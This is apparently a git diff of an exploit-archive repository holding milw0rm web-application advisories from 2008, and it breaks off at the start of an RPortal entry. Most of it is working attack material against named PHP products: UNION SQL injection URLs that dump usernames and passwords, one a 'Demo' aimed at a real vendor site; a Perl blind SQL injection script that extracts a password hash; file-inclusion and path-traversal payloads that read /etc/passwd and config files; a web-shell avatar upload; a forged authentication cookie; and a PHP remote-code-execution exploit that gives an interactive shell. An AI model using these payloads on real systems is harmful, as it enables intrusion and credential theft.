+|______________________________________________________________________
+
+
+                                       Im IRAQi    |    Im TrYaG I
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6632.txt b/platforms/php/webapps/6632.txt
index 65df8725c..5bcadf752 100755
--- a/platforms/php/webapps/6632.txt
+++ b/platforms/php/webapps/6632.txt
@@ -1,36 +1,36 @@
-**************************************************************************************
-
-Author : By DaRkLiFe
-Greetz : str0ke & S.VV.A.T.
-
-**************************************************************************************
-Script   :
-Micronation Banking System(minba) 1.5.0
-Remote File Inclusion Vulnerability(s)
-
-Download:
-http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0
-
-**************************************************************************************
-
-Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?
-
-
-http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?
-
-**************************************************************************************
-
-In Multiple files the vulnerability exists.
-
-I have posted two examples
-
-Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
-in minba/utility/utgn_message.php file
-
-
-**************************************************************************************
-
-THANKS ! GREETZ !
-**************************************************************************************
-
-# milw0rm.com [2008-09-30]
+**************************************************************************************
+
+Author : By DaRkLiFe
+Greetz : str0ke & S.VV.A.T.
+
+**************************************************************************************
+Script   :
+Micronation Banking System(minba) 1.5.0
+Remote File Inclusion Vulnerability(s)
+
+Download:
+http://downloads.sourceforge.net/minbank/minba_v0150.zip?modtime=1169500084&big_mirror=0
+
+**************************************************************************************
+
+Exploit : http://site.com/minba/utility/utdb_access.php?minsoft_path=Shellz?
+
+
+http://site.com/minba/utility/utgn_message.php?minsoft_path=Shellz?
+
+**************************************************************************************
+
+In Multiple files the vulnerability exists.
+
+I have posted two examples
+
+Vulberable : line 3 : require_once("$minsoft_path/utility/utgn_config.php");
+in minba/utility/utgn_message.php file
+
+
+**************************************************************************************
+
+THANKS ! GREETZ !
+**************************************************************************************
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6633.txt b/platforms/php/webapps/6633.txt
index a97ea0acc..6316dbe0a 100755
--- a/platforms/php/webapps/6633.txt
+++ b/platforms/php/webapps/6633.txt
@@ -1,51 +1,51 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-eFront <= 3.5.1 / build 2710: Remote File Inclusion Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-$ Program: eFront
-$ File affected: studentpage.php / professorpage
-$ Version: 3.5.1 / build 2710
-$ Download: http://www.efrontlearning.net
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
--- Description (by the author's page) --
-eFront is an easy to use, visually attractive, SCORM compatible, eLearning
-and Human Capital Development system. It is suitable for both company and
-educational usage. The core eFront system is offered as open-source software
-so you can download and start using it immediately. Check the functionality
-matrix for different eFront editions.
-
-
--- Bug --
-If you are a student or a teacher you can upload an avatar. It not check the
-extension (JPG, PNG, GIF, ...) and you can upload any file (ex: PHP)
-
-Website structure:
-
-site.com /
-         /upload/       		-> Files saved
-		/admin/
-                      /avatars
-                /student/
-                        /avatars
-                /professor/
-                          /avatars
-         /www				-> Website
-	 /backups
-         /libraries
-
-
--- Exploit --
-Students can upload a shell.php as the avatar ant next execute as:
-  http://site/upload/student/avatars/shell.php
-
-Teachers can upload a shell.php as the avatar ant next execute as:
-  http://site/upload/professor/avatars/shell.php
-
-
-Note: in all sites I've tested upload dorectory is accesible by web
-
-# milw0rm.com [2008-09-30]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+eFront <= 3.5.1 / build 2710: Remote File Inclusion Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+$ Program: eFront
+$ File affected: studentpage.php / professorpage
+$ Version: 3.5.1 / build 2710
+$ Download: http://www.efrontlearning.net
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+-- Description (by the author's page) --
+eFront is an easy to use, visually attractive, SCORM compatible, eLearning
+and Human Capital Development system. It is suitable for both company and
+educational usage. The core eFront system is offered as open-source software
+so you can download and start using it immediately. Check the functionality
+matrix for different eFront editions.
+
+
+-- Bug --
+If you are a student or a teacher you can upload an avatar. It not check the
+extension (JPG, PNG, GIF, ...) and you can upload any file (ex: PHP)
+
+Website structure:
+
+site.com /
+         /upload/       		-> Files saved
+		/admin/
+                      /avatars
+                /student/
+                        /avatars
+                /professor/
+                          /avatars
+         /www				-> Website
+	 /backups
+         /libraries
+
+
+-- Exploit --
+Students can upload a shell.php as the avatar ant next execute as:
+  http://site/upload/student/avatars/shell.php
+
+Teachers can upload a shell.php as the avatar ant next execute as:
+  http://site/upload/professor/avatars/shell.php
+
+
+Note: in all sites I've tested upload dorectory is accesible by web
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6635.txt b/platforms/php/webapps/6635.txt
index 0f5714e23..d0bd4e149 100755
--- a/platforms/php/webapps/6635.txt
+++ b/platforms/php/webapps/6635.txt
@@ -1,9 +1,9 @@
-###############################################################################################
-[+] SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability
-[+] Discovered By Stack            
-[+] Greetz : All my freind           
-################################################################################################
-Exploit:
-javascript:document.cookie = "Auth=1; path=/;";
-
-# milw0rm.com [2008-09-30]
+###############################################################################################
+[+] SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability
+[+] Discovered By Stack            
+[+] Greetz : All my freind           
+################################################################################################
+Exploit:
+javascript:document.cookie = "Auth=1; path=/;";
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6636.txt b/platforms/php/webapps/6636.txt
index d8328afcd..14cd14b1a 100755
--- a/platforms/php/webapps/6636.txt
+++ b/platforms/php/webapps/6636.txt
@@ -1,36 +1,36 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-/ Script: Rianxosencabos
-/ Version: 0.9
-/ File affected: scripts/links.php
-/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
-
-
-ka0x 
-D.O.M Labs - Security Researchers
-- www.domlabs.org
-
-Vuln code:
-
------
-88:  function visita($id) {
-93:  $resultado=$bd->consulta("SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1");
-....
-
-112: if ($_GET['id']) {
-113: links::visita($_GET['id'])
------
-
-
-Proof of Concept:
-
-http://[host]/[cms]/?s=links&id=1 and 1=1 -> True
-http://[host]/[cms]/?s=links&id=1 and 1=0 -> False
-http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52
-
-
-__END__
-
-# milw0rm.com [2008-09-30]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+/ Script: Rianxosencabos
+/ Version: 0.9
+/ File affected: scripts/links.php
+/ Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
+
+
+ka0x 
+D.O.M Labs - Security Researchers
+- www.domlabs.org
+
+Vuln code:
+
+-----
+88:  function visita($id) {
+93:  $resultado=$bd->consulta("SELECT direccion, clicks FROM links WHERE id=$id LIMIT 1");
+....
+
+112: if ($_GET['id']) {
+113: links::visita($_GET['id'])
+-----
+
+
+Proof of Concept:
+
+http://[host]/[cms]/?s=links&id=1 and 1=1 -> True
+http://[host]/[cms]/?s=links&id=1 and 1=0 -> False
+http://[host]/[cms]/?s=links&id=1 and ascii(substring(@@version,1,1)=52
+
+
+__END__
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6637.txt b/platforms/php/webapps/6637.txt
index 05751de3c..28a39682f 100755
--- a/platforms/php/webapps/6637.txt
+++ b/platforms/php/webapps/6637.txt
@@ -1,49 +1,49 @@
-|___________________________________________________|
-|
-| BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  IQ-SecuritY  >   WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                    |
-|
-| script : http://www.quidascript.com/index.php?main_page=product_info&products_id=77
-|
-| DorK   : inurl:view_group.php?id=
-|___________________________________________________|
-
-
-Exploit:
-
-www.[target].com/Script/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--
-
-
-
-Demo :
-
-http://www.quidascript.com/bookmarks/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|______________________________________________________________________
-
-
-                                  Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-09-30]
+|___________________________________________________|
+|
+| BookMarks Favourites Script (view_group.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  IQ-SecuritY  >   WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                    |
+|
+| script : http://www.quidascript.com/index.php?main_page=product_info&products_id=77
+|
+| DorK   : inurl:view_group.php?id=
+|___________________________________________________|
+
+
+Exploit:
+
+www.[target].com/Script/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--
+
+
+
+Demo :
+
+http://www.quidascript.com/bookmarks/view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|______________________________________________________________________
+
+
+                                  Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6639.txt b/platforms/php/webapps/6639.txt
index aeccceec5..025a76de1 100755
--- a/platforms/php/webapps/6639.txt
+++ b/platforms/php/webapps/6639.txt
@@ -1,39 +1,39 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Printlog <= 0.4: Remote File Edition Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-$ Program: Printlog
-$ File affected: index.php
-$ Version: 0.4
-$ Download: http://www.hardkap.net/pritlog
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
--- Description (by the author's page) --
-PRITLOG is an extremely simple, small and powerful blog system. It does not 
-use or need a MYSQL database and fully works based on flat files. The idea 
-is derived from a similar app called PPLOG.
-
--- Bug --
-You can navigate and see the entries. Something like as:
-  http://localhost/p/index.php?option=viewEntry&filename=00001
-
-Code doesn't check the comments directory:
-
-709.  function viewEntry() {
-710.	$fileName   = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
-711.	global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows;
-712.	global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString;
-713.	global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
-714.	$viewFileName=$postdir.$fileName.$config_dbFilesExtension;
-
-
--- Exploit --
-If magic quotes are off you can do:
-  http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
-
-config.php has the admin password
-
-# milw0rm.com [2008-09-30]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Printlog <= 0.4: Remote File Edition Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+$ Program: Printlog
+$ File affected: index.php
+$ Version: 0.4
+$ Download: http://www.hardkap.net/pritlog
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+-- Description (by the author's page) --
+PRITLOG is an extremely simple, small and powerful blog system. It does not 
+use or need a MYSQL database and fully works based on flat files. The idea 
+is derived from a similar app called PPLOG.
+
+-- Bug --
+You can navigate and see the entries. Something like as:
+  http://localhost/p/index.php?option=viewEntry&filename=00001
+
+Code doesn't check the comments directory:
+
+709.  function viewEntry() {
+710.	$fileName   = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
+711.	global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows;
+712.	global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString;
+713.	global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
+714.	$viewFileName=$postdir.$fileName.$config_dbFilesExtension;
+
+
+-- Exploit --
+If magic quotes are off you can do:
+  http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
+
+config.php has the admin password
+
+# milw0rm.com [2008-09-30]
diff --git a/platforms/php/webapps/6640.pl b/platforms/php/webapps/6640.pl
index d4117070b..8b89d3d0d 100755
--- a/platforms/php/webapps/6640.pl
+++ b/platforms/php/webapps/6640.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-# --------------------------------------------------
-# ADN Forum <= 1.0b Blind SQL Injection Exploit
-# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
-# Discovered On: 01/10/2008
-# Download: http://sourceforge.net/projects/adnforum/
-# --------------------------------------------------
-# Usage: perl exploit.pl http://localhost
-# --------------------------------------------------
-
-use strict;
-use warnings;
-use LWP::UserAgent;
-use URI::Escape;
-
-my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);
-
-my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
-my @chars = (48..57, 97..102); 
-my $http = new LWP::UserAgent;
-
-for(0..32)
-{
-  foreach $ord(@chars) 
-  {
-    $send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#";
-    $send = uri_escape($send);
-    
-    $request = $http->get($host."/index.php?fid=".$send);
-    
-    if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
-    {
-      $hash .= chr($ord); 
-      $uid++;
-    }
-  }
-}
-
-if(defined $hash)
-{
-  print "[+] MD5: $hash\n";
-  exit;
-}
-else
-{
-  print "[?] Exploit Failed!\n";
-  exit;
-}
-
-# milw0rm.com [2008-10-01]
+#!/usr/bin/perl
+# --------------------------------------------------
+# ADN Forum <= 1.0b Blind SQL Injection Exploit
+# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
+# Discovered On: 01/10/2008
+# Download: http://sourceforge.net/projects/adnforum/
+# --------------------------------------------------
+# Usage: perl exploit.pl http://localhost
+# --------------------------------------------------
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+use URI::Escape;
+
+my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);
+
+my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
+my @chars = (48..57, 97..102); 
+my $http = new LWP::UserAgent;
+
+for(0..32)
+{
+  foreach $ord(@chars) 
+  {
+    $send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#";
+    $send = uri_escape($send);
+    
+    $request = $http->get($host."/index.php?fid=".$send);
+    
+    if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
+    {
+      $hash .= chr($ord); 
+      $uid++;
+    }
+  }
+}
+
+if(defined $hash)
+{
+  print "[+] MD5: $hash\n";
+  exit;
+}
+else
+{
+  print "[?] Exploit Failed!\n";
+  exit;
+}
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6641.txt b/platforms/php/webapps/6641.txt
index bbfacf79d..f443b226e 100755
--- a/platforms/php/webapps/6641.txt
+++ b/platforms/php/webapps/6641.txt
@@ -1,42 +1,42 @@
-# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
-# url: http://www.mysqlquickadmin.com/
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-#
-# Greetz To: Pepelux :)
-#
-# *Requirements: magic_quotes_gpc = Off
-
-vuln file: /includes/required.php
-vuln code: 
-
-if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
-	$_SESSION['language'] = $_COOKIE['language'];
-}
-
-....
-
-if(LANG == ""){
-	if(!isset($_SESSION['language'])){
-		include("lang/english/lang.php");
-		$_LANG = "english";
-	} else {
-		include("lang/".$_SESSION['language']."/lang.php");
-		$_LANG = $_SESSION['language'];
-	}
-
-... }
-
-LFI (poc): 
-1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
-2) and enters /index.php
-
-Ingenious work :D
-
-# milw0rm.com [2008-10-01]
+# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
+# url: http://www.mysqlquickadmin.com/
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Greetz To: Pepelux :)
+#
+# *Requirements: magic_quotes_gpc = Off
+
+vuln file: /includes/required.php
+vuln code: 
+
+if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
+	$_SESSION['language'] = $_COOKIE['language'];
+}
+
+....
+
+if(LANG == ""){
+	if(!isset($_SESSION['language'])){
+		include("lang/english/lang.php");
+		$_LANG = "english";
+	} else {
+		include("lang/".$_SESSION['language']."/lang.php");
+		$_LANG = $_SESSION['language'];
+	}
+
+... }
+
+LFI (poc): 
+1) javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
+2) and enters /index.php
+
+Ingenious work :D
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6642.txt b/platforms/php/webapps/6642.txt
index b5cc04e16..0f15579ad 100755
--- a/platforms/php/webapps/6642.txt
+++ b/platforms/php/webapps/6642.txt
@@ -1,13 +1,13 @@
-Author: ~!Dok_tOR!~
-Date found: 30.09.08
-Product: BMForum
-Version: 5.6
-URL: www.bmforum.com
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit:
-
-http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*
-
-# milw0rm.com [2008-10-01]
+Author: ~!Dok_tOR!~
+Date found: 30.09.08
+Product: BMForum
+Version: 5.6
+URL: www.bmforum.com
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit:
+
+http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1'+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6644.txt b/platforms/php/webapps/6644.txt
index 1ef2cbb28..4c7a168c4 100755
--- a/platforms/php/webapps/6644.txt
+++ b/platforms/php/webapps/6644.txt
@@ -1,17 +1,17 @@
-Author: ~!Dok_tOR!~
-Date found: 30.09.08
-Product: NonameCMS
-Version: 1.0
-URL: noname-cms.org
-Vulnerability Class: SQL Injection
-Condition: magic_quotes_gpc = Off
-
-Exploit 1:
-
-http://localhost/[installdir]/index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user/*
-
-Exploit 2:
-
-http://localhost/[installdir]/index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user/*
-
-# milw0rm.com [2008-10-01]
+Author: ~!Dok_tOR!~
+Date found: 30.09.08
+Product: NonameCMS
+Version: 1.0
+URL: noname-cms.org
+Vulnerability Class: SQL Injection
+Condition: magic_quotes_gpc = Off
+
+Exploit 1:
+
+http://localhost/[installdir]/index.php?action=detailansicht&file_id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,benutzername,passwort,email),8+from+nns_user/*
+
+Exploit 2:
+
+http://localhost/[installdir]/index.php?action=kategorien&kategorie=-1'+union+select+1,2,user(),concat_ws(0x3a,benutzername,passwort,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+nns_user/*
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6645.txt b/platforms/php/webapps/6645.txt
index 462403eb5..67d8711bd 100755
--- a/platforms/php/webapps/6645.txt
+++ b/platforms/php/webapps/6645.txt
@@ -1,19 +1,19 @@
- ~~+=========================================================+~~
- ~~+=========================================================+~~
-  [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
-  [?] Discovered On: 01/10/2008
-  [*] PHP.ini 
-  [*] Magic_Quotes_Gpc = Off
- ~~+=========================================================+~~
-  (index.php) // Greetz -> Osirys and darkjoker
-  14. $m = $_GET['m'];
-  15. $p = $_GET['p'];
-  16. $dir = $_GET['dir'];
-  17. require_once("main.php");
-  18. require_once("themes/".$theme."/theme.php"); 
-  $theme  isn't declared, so you can include any file.
-  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
-  [*] How To Fix: declare $theme
-  ~~+=========================================================+~~
-
-# milw0rm.com [2008-10-01]
+ ~~+=========================================================+~~
+ ~~+=========================================================+~~
+  [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
+  [?] Discovered On: 01/10/2008
+  [*] PHP.ini 
+  [*] Magic_Quotes_Gpc = Off
+ ~~+=========================================================+~~
+  (index.php) // Greetz -> Osirys and darkjoker
+  14. $m = $_GET['m'];
+  15. $p = $_GET['p'];
+  16. $dir = $_GET['dir'];
+  17. require_once("main.php");
+  18. require_once("themes/".$theme."/theme.php"); 
+  $theme  isn't declared, so you can include any file.
+  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
+  [*] How To Fix: declare $theme
+  ~~+=========================================================+~~
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6646.php b/platforms/php/webapps/6646.php
index bedbfe021..f2e6edcb8 100755
--- a/platforms/php/webapps/6646.php
+++ b/platforms/php/webapps/6646.php
@@ -1,107 +1,107 @@
-set_title(translate("Processing $Class"));
-	53.		$t->printHTMLHeader();
-	54.		$t->startMain();
-	55.	
-	56.		process_reservation($_POST['fn']);
-	57.	}
-	58.	else {
-	59.		$res_info = getResInfo();
-	60.		$t->set_title($res_info['title']);
-	61.		$t->printHTMLHeader();
-	62.	   	$t->startMain();
-	63.	   	present_reservation($res_info['resid']);
-	64.	}
-
-	[...]
-	
-	79.	function process_reservation($fn) {
-	80.		$success = false;
-	81.		global $Class;
-	82.		$is_pending = (isset($_POST['pending']) && $_POST['pending']);
-	83.	
-	84.		if (isset($_POST['start_date'])) {			// Parse the POST-ed starting and ending dates
-	85.			$start_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['start_date']) . '\');');
-	86.			$end_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['end_date']) . '\');');
-	87.		}
-	
-	An attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-define(STDIN, fopen("php://stdin", "r"));
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-print "\n+---------------------------------------------------------------+";
-print "\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |";
-print "\n+---------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path\n";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /phpscheduleit/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23";
-$packet  = "POST {$path}reserve.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Referer: {$path}reserve.php\r\n";
-$packet .= "Cmd: %s\r\n";
-$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n";
-$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $payload;
-
-while(1)
-{
-	print "\nphpscheduleit-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$html  = http_send($host, sprintf($packet, base64_encode($cmd)));
-		$shell = explode("_code_", $html);
-		preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-10-01]
+set_title(translate("Processing $Class"));
+	53.		$t->printHTMLHeader();
+	54.		$t->startMain();
+	55.	
+	56.		process_reservation($_POST['fn']);
+	57.	}
+	58.	else {
+	59.		$res_info = getResInfo();
+	60.		$t->set_title($res_info['title']);
+	61.		$t->printHTMLHeader();
+	62.	   	$t->startMain();
+	63.	   	present_reservation($res_info['resid']);
+	64.	}
+
+	[...]
+	
+	79.	function process_reservation($fn) {
+	80.		$success = false;
+	81.		global $Class;
+	82.		$is_pending = (isset($_POST['pending']) && $_POST['pending']);
+	83.	
+	84.		if (isset($_POST['start_date'])) {			// Parse the POST-ed starting and ending dates
+	85.			$start_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['start_date']) . '\');');
+	86.			$end_date = eval('return mktime(0,0,0, \'' . str_replace(INTERNAL_DATE_SEPERATOR, '\',\'', $_POST['end_date']) . '\');');
+	87.		}
+	
+	An attacker might be able to inject and execute PHP code through $_POST['start_date'], that is passed to eval() at line 85
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+define(STDIN, fopen("php://stdin", "r"));
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+print "\n+---------------------------------------------------------------+";
+print "\n| phpScheduleIt <= 1.2.10 Remote Code Execution Exploit by EgiX |";
+print "\n+---------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path\n";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /phpscheduleit/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23";
+$packet  = "POST {$path}reserve.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Referer: {$path}reserve.php\r\n";
+$packet .= "Cmd: %s\r\n";
+$packet .= "Content-Length: ".(strlen($payload)-1)."\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+
+while(1)
+{
+	print "\nphpscheduleit-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$html  = http_send($host, sprintf($packet, base64_encode($cmd)));
+		$shell = explode("_code_", $html);
+		preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6648.txt b/platforms/php/webapps/6648.txt
index 052c58348..122e7438b 100755
--- a/platforms/php/webapps/6648.txt
+++ b/platforms/php/webapps/6648.txt
@@ -1,52 +1,52 @@
-#########################################################
-#
-# RPortal v1.1
-#
-#
-# Rportal is a management system of contents simple and powerful Web,
-# enabling you to create your site in a few minutes, while profiting
-# from a complete and effective administration.
-#
-#
-# Remote and Local File Inclusion Vulnerability <= 1.1
-# Found the 29th September 2008
